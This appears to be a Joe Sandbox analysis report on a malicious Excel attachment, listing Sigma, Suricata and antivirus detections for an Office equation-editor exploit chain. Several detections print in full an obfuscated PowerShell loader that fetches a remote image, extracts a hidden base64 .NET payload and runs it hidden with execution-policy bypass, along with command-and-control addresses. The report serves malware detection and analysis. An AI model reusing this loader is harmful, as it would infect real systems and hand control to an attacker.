    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhKZjVpbWFnZUJ5dCcrJ2VzKTtKZjVzdGFydEZsYWcgPSA3WmE8PEJBU0U2NF9TVEFSVD4nKyc+N1phO0pmNWVuZEZsYWcgJysnPSA3WmE8PEJBU0U2NF9FTkQ+PjdaYTtKZjVzdGFydEluZGV4ID0gSmY1aW1hZ2VUZXh0JysnLkluZGV4T2YoSmY1c3RhcnRGbGFnKTtKZjVlbmRJbmRleCA9IEpmNWltYWdlVGV4dC5JbmRleE9mKEonKydmNWVuZEZsYWcpO0pmNXN0YXJ0SW5kZXggLWdlIDAgLWFuZCBKZjVlbmRJbmQnKydleCAtZ3QgSmY1c3RhcnRJbmRleDtKZjVzdGFydEluZGV4ICs9IEpmNXN0YXJ0RmxhZy5MZW5ndCcrJ2g7SmY1YmFzZTY0TGVuZ3RoID0gSmYnKyc1ZW5kSW5kZXggLSBKZjUnKydzdGFydEluZCcrJ2V4O0pmNWJhc2U2NENvbW1hbmQgPScrJyBKZjUnKydpbWFnZVRleHQuU3Vic3RyaW5nKEpmNXN0YXJ0SW5kZXgsIEpmNWJhJysnc2U2NExlbmd0aCk7SmY1YmFzZTYnKyc0UmV2ZXJzZWQgPSAtaicrJ29pbiAoSmY1YmFzZTYnKyc0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFFHMCBGb3JFYWNoLU9iamVjdCcrJyB7IEpmNV8gfSlbLTEuLi0oSmY1JysnYmFzJysnZTY0Q29tbWFuZC5MZW5ndGgpXTtKZjVjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKEpmNWJhc2U2NFJldmVyc2VkKTtKZjVsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseScrJ106OkxvYWQoSmY1Y29tbWFuZEJ5dGVzKTtKZjV2YWlNZXRob2QnKycgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDdaYVZBSTdaYSk7SmY1dmFpTWV0aG9kLkludm9rZShKZjVudWxsLCBAKDdaYXR4dC5SVENDQ1JWLzYyMi81MTIuODIxLjU5LjMyLy86cCcrJ3R0aDdaYSwgN1phZGVzYXRpdmFkbzdaYSwgN1phZGVzYXQnKydpdmFkbzdaYSwgN1phZGVzYXRpdicrJ2FkbzdaYSwgN1phYXMnKydwbmUnKyd0X2NvbXBpbGVyN1phLCA3WmFkZXNhdGl2YWRvN1phLCA3WmFkZXNhdGl2YWRvN1phLDdaJysnYWRlc2F0aXZhZCcrJ283WmEsN1phJysnZGVzYXQnKydpdmFkbzdaYSw3WmFkZXNhJysndGl2YWRvN1phLDdaYWRlc2F0aXZhZG83WmEsN1phZGVzYXRpdmEnKydkbzdaYSw3WmExN1phLDdaYWRlc2F0aXZhZG83WmEpKTsnKS5SRVBsQWNlKCdKZjUnLFtTdHJpTkddW0NoQVJdMzYpLlJFUGxBY2UoJzdaYScsW1N0cmlOR11bQ2hBUl0zOSkuUkVQbEFjZSgoW0NoQVJdODErW0NoQVJdNzErW0NoQVJdNDgpLFtTdHJpTkddW0NoQVJdMTI0KSB8IC4oICRwc2hPbUVbMjFdKyRwU0hPbWVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBb
    Sigma detected: PowerShell Base64 Encoded Invoke Keyword
    Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhKZjVpbWFnZUJ5dCcrJ2VzKTtKZjVzdGFydEZsYWcgPSA3WmE8PEJBU0U2NF9TVEFSVD4nKyc+N1phO0pmNWVuZEZsYWcgJysnPSA3WmE8PEJBU0U2NF9FTkQ+PjdaYTtKZjVzdGFydEluZGV4ID0gSmY1aW1hZ2VUZXh0JysnLkluZGV4T2YoSmY1c3RhcnRGbGFnKTtKZjVlbmRJbmRleCA9IEpmNWltYWdlVGV4dC5JbmRleE9mKEonKydmNWVuZEZsYWcpO0pmNXN0YXJ0SW5kZXggLWdlIDAgLWFuZCBKZjVlbmRJbmQnKydleCAtZ3QgSmY1c3RhcnRJbmRleDtKZjVzdGFydEluZGV4ICs9IEpmNXN0YXJ0RmxhZy5MZW5ndCcrJ2g7SmY1YmFzZTY0TGVuZ3RoID0gSmYnKyc1ZW5kSW5kZXggLSBKZjUnKydzdGFydEluZCcrJ2V4O0pmNWJhc2U2NENvbW1hbmQgPScrJyBKZjUnKydpbWFnZVRleHQuU3Vic3RyaW5nKEpmNXN0YXJ0SW5kZXgsIEpmNWJhJysnc2U2NExlbmd0aCk7SmY1YmFzZTYnKyc0UmV2ZXJzZWQgPSAtaicrJ29pbiAoSmY1YmFzZTYnKyc0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFFHMCBGb3JFYWNoLU9iamVjdCcrJyB7IEpmNV8gfSlbLTEuLi0oSmY1JysnYmFzJysnZTY0Q29tbWFuZC5MZW5ndGgpXTtKZjVjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKEpmNWJhc2U2NFJldmVyc2VkKTtKZjVsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseScrJ106OkxvYWQoSmY1Y29tbWFuZEJ5dGVzKTtKZjV2YWlNZXRob2QnKycgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDdaYVZBSTdaYSk7SmY1dmFpTWV0aG9kLkludm9rZShKZjVudWxsLCBAKDdaYXR4dC5SVENDQ1JWLzYyMi81MTIuODIxLjU5LjMyLy86cCcrJ3R0aDdaYSwgN1phZGVzYXRpdmFkbzdaYSwgN1phZGVzYXQnKydpdmFkbzdaYSwgN1phZGVzYXRpdicrJ2FkbzdaYSwgN1phYXMnKydwbmUnKyd0X2NvbXBpbGVyN1phLCA3WmFkZXNhdGl2YWRvN1phLCA3WmFkZXNhdGl2YWRvN1phLDdaJysnYWRlc2F0aXZhZCcrJ283WmEsN1phJysnZGVzYXQnKydpdmFkbzdaYSw3WmFkZXNhJysndGl2YWRvN1phLDdaYWRlc2F0aXZhZG83WmEsN1phZGVzYXRpdmEnKydkbzdaYSw3WmExN1phLDdaYWRlc2F0aXZhZG83WmEpKTsnKS5SRVBsQWNlKCdKZjUnLFtTdHJpTkddW0NoQVJdMzYpLlJFUGxBY2UoJzdaYScsW1N0cmlOR11bQ2hBUl0zOSkuUkVQbEFjZSgoW0NoQVJdODErW0NoQVJdNzErW0NoQVJdNDgpLFtTdHJpTkddW0NoQVJdMTI0KSB8IC4oICRwc2hPbUVbMjFdKyRwU0hPbWVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBb
    Sigma detected: Suspicious Microsoft Office Child Process
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3208, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs" , ProcessId: 3880, ProcessName: wscript.exe
    Sigma detected: WScript or CScript Dropper
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3208, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs" , ProcessId: 3880, ProcessName: wscript.exe
    Sigma detected: Change PowerShell Policies to an Insecure Level
    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhKZjVpbWFnZUJ5dCcrJ2VzKTtKZjVzdGFydEZsYWcgPSA3WmE8PEJBU0U2NF9TVEFSVD4nKyc+N1phO0pmNWVuZEZsYWcgJysnPSA3WmE8PEJBU0U2NF9FTkQ+PjdaYTtKZjVzdGFydEluZGV4ID0gSmY1aW1hZ2VUZXh0JysnLkluZGV4T2YoSmY1c3RhcnRGbGFnKTtKZjVlbmRJbmRleCA9IEpmNWltYWdlVGV4dC5JbmRleE9mKEonKydmNWVuZEZsYWcpO0pmNXN0YXJ0SW5kZXggLWdlIDAgLWFuZCBKZjVlbmRJbmQnKydleCAtZ3QgSmY1c3RhcnRJbmRleDtKZjVzdGFydEluZGV4ICs9IEpmNXN0YXJ0RmxhZy5MZW5ndCcrJ2g7SmY1YmFzZTY0TGVuZ3RoID0gSmYnKyc1ZW5kSW5kZXggLSBKZjUnKydzdGFydEluZCcrJ2V4O0pmNWJhc2U2NENvbW1hbmQgPScrJyBKZjUnKydpbWFnZVRleHQuU3Vic3RyaW5nKEpmNXN0YXJ0SW5kZXgsIEpmNWJhJysnc2U2NExlbmd0aCk7SmY1YmFzZTYnKyc0UmV2ZXJzZWQgPSAtaicrJ29pbiAoSmY1YmFzZTYnKyc0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFFHMCBGb3JFYWNoLU9iamVjdCcrJyB7IEpmNV8gfSlbLTEuLi0oSmY1JysnYmFzJysnZTY0Q29tbWFuZC5MZW5ndGgpXTtKZjVjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKEpmNWJhc2U2NFJldmVyc2VkKTtKZjVsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseScrJ106OkxvYWQoSmY1Y29tbWFuZEJ5dGVzKTtKZjV2YWlNZXRob2QnKycgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDdaYVZBSTdaYSk7SmY1dmFpTWV0aG9kLkludm9rZShKZjVudWxsLCBAKDdaYXR4dC5SVENDQ1JWLzYyMi81MTIuODIxLjU5LjMyLy86cCcrJ3R0aDdaYSwgN1phZGVzYXRpdmFkbzdaYSwgN1phZGVzYXQnKydpdmFkbzdaYSwgN1phZGVzYXRpdicrJ2FkbzdaYSwgN1phYXMnKydwbmUnKyd0X2NvbXBpbGVyN1phLCA3WmFkZXNhdGl2YWRvN1phLCA3WmFkZXNhdGl2YWRvN1phLDdaJysnYWRlc2F0aXZhZCcrJ283WmEsN1phJysnZGVzYXQnKydpdmFkbzdaYSw3WmFkZXNhJysndGl2YWRvN1phLDdaYWRlc2F0aXZhZG83WmEsN1phZGVzYXRpdmEnKydkbzdaYSw3WmExN1phLDdaYWRlc2F0aXZhZG83WmEpKTsnKS5SRVBsQWNlKCdKZjUnLFtTdHJpTkddW0NoQVJdMzYpLlJFUGxBY2UoJzdaYScsW1N0cmlOR11bQ2hBUl0zOSkuUkVQbEFjZSgoW0NoQVJdODErW0NoQVJdNzErW0NoQVJdNDgpLFtTdHJpTkddW0NoQVJdMTI0KSB8IC4oICRwc2hPbUVbMjFdKyRwU0hPbWVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBb
    Sigma detected: Excel Network Connections
    Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 152.231.102.107, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3208, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
    Sigma detected: Suspicious Office Outbound Connections
    Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49165, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3208, Protocol: tcp, SourceIp: 152.231.102.107, SourceIsIpv6: false, SourcePort: 443
    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3208, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs" , ProcessId: 3880, ProcessName: wscript.exe
    Sigma detected: Modification of IE Registry Settings
    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3208, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhKZjVpbWFnZUJ5dCcrJ2VzKTtKZjVzdGFydEZsYWcgPSA3WmE8PEJBU0U2NF9TVEFSVD4nKyc+N1phO0pmNWVuZEZsYWcgJysnPSA3WmE8PEJBU0U2NF9FTkQ+PjdaYTtKZjVzdGFydEluZGV4ID0gSmY1aW1hZ2VUZXh0JysnLkluZGV4T2YoSmY1c3RhcnRGbGFnKTtKZjVlbmRJbmRleCA9IEpmNWltYWdlVGV4dC5JbmRleE9mKEonKydmNWVuZEZsYWcpO0pmNXN0YXJ0SW5kZXggLWdlIDAgLWFuZCBKZjVlbmRJbmQnKydleCAtZ3QgSmY1c3RhcnRJbmRleDtKZjVzdGFydEluZGV4ICs9IEpmNXN0YXJ0RmxhZy5MZW5ndCcrJ2g7SmY1YmFzZTY0TGVuZ3RoID0gSmYnKyc1ZW5kSW5kZXggLSBKZjUnKydzdGFydEluZCcrJ2V4O0pmNWJhc2U2NENvbW1hbmQgPScrJyBKZjUnKydpbWFnZVRleHQuU3Vic3RyaW5nKEpmNXN0YXJ0SW5kZXgsIEpmNWJhJysnc2U2NExlbmd0aCk7SmY1YmFzZTYnKyc0UmV2ZXJzZWQgPSAtaicrJ29pbiAoSmY1YmFzZTYnKyc0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFFHMCBGb3JFYWNoLU9iamVjdCcrJyB7IEpmNV8gfSlbLTEuLi0oSmY1JysnYmFzJysnZTY0Q29tbWFuZC5MZW5ndGgpXTtKZjVjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKEpmNWJhc2U2NFJldmVyc2VkKTtKZjVsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseScrJ106OkxvYWQoSmY1Y29tbWFuZEJ5dGVzKTtKZjV2YWlNZXRob2QnKycgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDdaYVZBSTdaYSk7SmY1dmFpTWV0aG9kLkludm9rZShKZjVudWxsLCBAKDdaYXR4dC5SVENDQ1JWLzYyMi81MTIuODIxLjU5LjMyLy86cCcrJ3R0aDdaYSwgN1phZGVzYXRpdmFkbzdaYSwgN1phZGVzYXQnKydpdmFkbzdaYSwgN1phZGVzYXRpdicrJ2FkbzdaYSwgN1phYXMnKydwbmUnKyd0X2NvbXBpbGVyN1phLCA3WmFkZXNhdGl2YWRvN1phLCA3WmFkZXNhdGl2YWRvN1phLDdaJysnYWRlc2F0aXZhZCcrJ283WmEsN1phJysnZGVzYXQnKydpdmFkbzdaYSw3WmFkZXNhJysndGl2YWRvN1phLDdaYWRlc2F0aXZhZG83WmEsN1phZGVzYXRpdmEnKydkbzdaYSw3WmExN1phLDdaYWRlc2F0aXZhZG83WmEpKTsnKS5SRVBsQWNlKCdKZjUnLFtTdHJpTkddW0NoQVJdMzYpLlJFUGxBY2UoJzdaYScsW1N0cmlOR11bQ2hBUl0zOSkuUkVQbEFjZSgoW0NoQVJdODErW0NoQVJdNzErW0NoQVJdNDgpLFtTdHJpTkddW0NoQVJdMTI0KSB8IC4oICRwc2hPbUVbMjFdKyRwU0hPbWVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBb
    Sigma detected: Office Macro File Creation
    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3472, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
    Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3924, TargetFilename: C:\Users\user\AppData\Local\Temp\bkkuvkek.fso.ps1

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-27T17:56:25.440158+010028587951A Network Trojan was detected192.168.2.224917423.95.128.21580TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for dropped file
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B7AFCBA1.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestof[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{498AB1A3-A070-4AC4-B443-2EA9C1DC4C55}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
    Multi AV Scanner detection for submitted file
    Source: Pedido No 4500924462.xlsReversingLabs: Detection: 23%
    Machine Learning detection for sample
    Source: Pedido No 4500924462.xlsJoe Sandbox ML: detected

    Exploits

    barindex
    Office equation editor establishes network connection
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 23.95.128.215 Port: 80Jump to behavior
    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
